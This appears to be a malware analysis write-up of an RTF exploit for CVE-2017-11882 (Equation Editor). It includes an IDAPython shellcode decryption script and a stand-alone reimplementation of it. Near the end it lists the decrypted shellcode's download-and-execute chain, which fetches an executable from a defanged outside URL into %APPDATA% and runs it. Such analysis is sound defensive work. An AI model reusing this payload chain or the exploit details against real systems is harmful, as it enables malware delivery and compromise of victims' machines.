CVE-2017-11882 RTF

Looking for an OLE

RTF Hide & Seek
rtfdump.py
No OLE objects detected by rtfdump.py
rtfobj
One OLE object instance identified

Analyzing the OLE

CLSID related to Equation Editor
OLE CLSID
OLE Native Stream

Return to stack

Shellcode map
Windbg return to stack

Analyzing the shellcode

import struct
from ctypes import c_uint
from idc import Byte, PatchByte   # IDAPython API (legacy names; get_wide_byte/patch_byte in IDA 7+)

def run():
    startPos = 0x4013fe           # first byte of the encrypted shellcode in the IDB
    xored = 0                     # key state, seeded with 0
    # one 32-bit key word for every 4 bytes of the 0x389-byte blob
    for index in range(startPos, startPos + 0x389, 4):
        xored = xored * 0x22A76047
        xored = xored + 0x2698B12D
        key = struct.pack('<I', c_uint(xored).value)   # truncate to 32 bits, little-endian
        for i in range(0, 4):
            patched_byte = bytearray(key)[i] ^ Byte(index + i)
            PatchByte(index + i, patched_byte)
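As an added example (not the author's IDAPython script), the same key schedule reimplemented as a stand-alone function that works on a byte buffer outside IDA, so the blob can be decrypted from a memory dump or a carved sample; the input below is constructed for the demo, not taken from the malware.

```python
import struct

# Constants recovered from the decryption loop above
MULT = 0x22A76047   # multiplier applied to the running key
ADD = 0x2698B12D    # increment added after the multiply
MASK = 0xFFFFFFFF   # the loop works in 32-bit arithmetic


def keystream(n_words):
    """Yield the little-endian 32-bit key words the loop derives:
    k_0 = 0, k_{i+1} = (k_i * MULT + ADD) mod 2^32."""
    k = 0
    for _ in range(n_words):
        k = (k * MULT + ADD) & MASK
        yield struct.pack('<I', k)


def xor_transform(data):
    """XOR data against the keystream, word by word.
    XOR is its own inverse, so this decrypts the blob and also
    re-encrypts plaintext; a trailing partial word is handled
    without writing past the end of the buffer (the IDA loop
    would patch up to 3 bytes beyond 0x389)."""
    buf = bytearray(data)
    n_words = (len(buf) + 3) // 4
    for word_idx, key in enumerate(keystream(n_words)):
        for j in range(4):
            pos = word_idx * 4 + j
            if pos >= len(buf):
                break
            buf[pos] ^= key[j]
    return bytes(buf)


if __name__ == "__main__":
    # Constructed stand-in for the 0x389-byte shellcode region
    plaintext = b"constructed sample: %APPDATA%\\wwindowss.exe\x00"
    encrypted = xor_transform(plaintext)
    assert xor_transform(encrypted) == plaintext
    print(encrypted.hex())
```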
Bytes before and after the decryption
Before the decryption
After the decryption
  • ExpandEnvironmentStringsW("%APPDATA%\wwindowss.exe", dst_path)
  • URLDownloadToFileW("hxxp://reggiewaller.com/404/ac/ppre.exe", dst_path)
  • CreateProcessW("C:\Users\vmuser\AppData\Roaming\wwindowss.exe")
  • ExitProcess

TL;DR
